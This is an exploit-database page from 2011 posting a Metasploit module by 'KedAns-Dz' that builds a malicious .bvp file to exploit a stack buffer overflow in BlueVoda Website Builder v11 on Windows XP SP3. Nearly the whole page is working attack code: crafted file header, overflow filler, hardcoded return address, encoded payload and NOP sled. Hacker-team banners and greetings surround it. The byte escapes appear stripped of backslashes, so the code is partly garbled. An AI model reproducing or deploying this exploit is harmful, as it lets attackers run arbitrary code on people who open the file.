Home / exploitsPDF  

BlueVoda Website Builder 11 Stack Buffer Overflow

Posted on 09 May 2011

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 # BlueVoda Website Builder v.11 (.bvp) Stack Buffer Overflow (meta) # By KedAns-Dz # $bvp_wb11_sbof.rb | 06/05/2011 00:05 $ # Windows XP SP3 Fr require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'BlueVoda Website Builder v.11 (.bvp) Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in versions v11 creating a specially crafted .bvp file, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => 'KedAns-Dz <ked-h[at]hotmail.com>', 'Version' => 'Version 1', 'References' => [ [ 'URL', 'http://1337day.com/exploits/16063' ], [ 'URL', 'http://www.exploit-id.com/local-exploits/bluevoda-website-builder-v-11-bvp-stack-buffer-overflow' ], [ 'URL', 'http://www.09exploit.com/archives/758' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 900, 'BadChars' => "x3a", 'StackAdjustment' => -3500, 'DisableNops' => 'True', }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP3 France', { 'Ret' => 0x0041E116} ], # call esp ], 'Privileged' => false, 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'KedAns.bvp']), ], self.class) end def exploit sploit = "xd0xcfx11xe0xa1xb1x1axe1x00x00x00x00x00x00x00x00" # Header sploit << "x00x00x00x00x00x00x00x00x3ex00x03x00xfexffx09" sploit << "xebx02x90x90" # jmp - from BlueVoda.exe sploit << rand_text_alpha_upper(321) # Buffer Overflow sploit << "xffx52x7c" # Call - from BlueVoda.exe sploit << [target.ret].pack('V') sploit << payload.encoded sploit << "x90" * 51 # nopsled ked = sploit print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(ked) end end #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * # gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... # Exploit-Id Team : jos_ali_joe + Caddy-Dz (exploit-id.com) ... All Others * TreX (hotturks.org) # JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org) # www.metasploit.com * www.09exploit.com * All Security and Exploits Webs ... #================================================================================================

 

TOP